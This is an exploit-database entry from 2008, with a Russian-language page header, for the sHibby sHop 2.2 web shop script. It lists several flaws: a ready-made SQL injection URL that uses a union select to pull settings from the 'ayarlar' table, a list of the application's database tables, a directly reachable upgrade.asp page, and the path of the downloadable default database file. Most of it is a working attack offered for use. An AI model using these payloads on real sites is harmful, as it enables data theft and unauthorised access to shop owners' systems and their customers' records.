Exploit shibby shop 2.2 - Multiple Vulnerabilities

[Exploiter]

EDB-ID

5895

Проверка EDB

1. Пройдено

Автор

KNOCKOUT

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2008-2882 cve-2008-2873 cve-2008-2872

Дата публикации

2008-06-22

Title: sHibby sHop v2.2 <= Remote (SQL/Update) Multiple Vulnerability

================================================================

[+] Author : KnocKout
[+] Special Thankz : Dr.Kacak
[+] System 0VerfL0verZ

=================================================================

Script : sHibby sHop
Verz: 2.2
Download : http://aspindir.com/goster/4476

 

SQL attack ;

http://target.com/path/default.asp?git=4&sayfa=-3+union+all+select+0,copy,keyword+from+ayarlar

Tables;

yasakli
ustmenu
urun_yorum
urun
ureticiler
tema
site_gel
siparis
sayfa
say_site
say_ip
say_hit
online
kategori
banner
ayarlar

 ------------
 
 Update file ( Direct Access )

 http://localsite.com/path/upgrade.asp
 

And default Database file

http://target.com/path/Db/urun.mdb

###############################################################

# milw0rm.com [2008-06-22]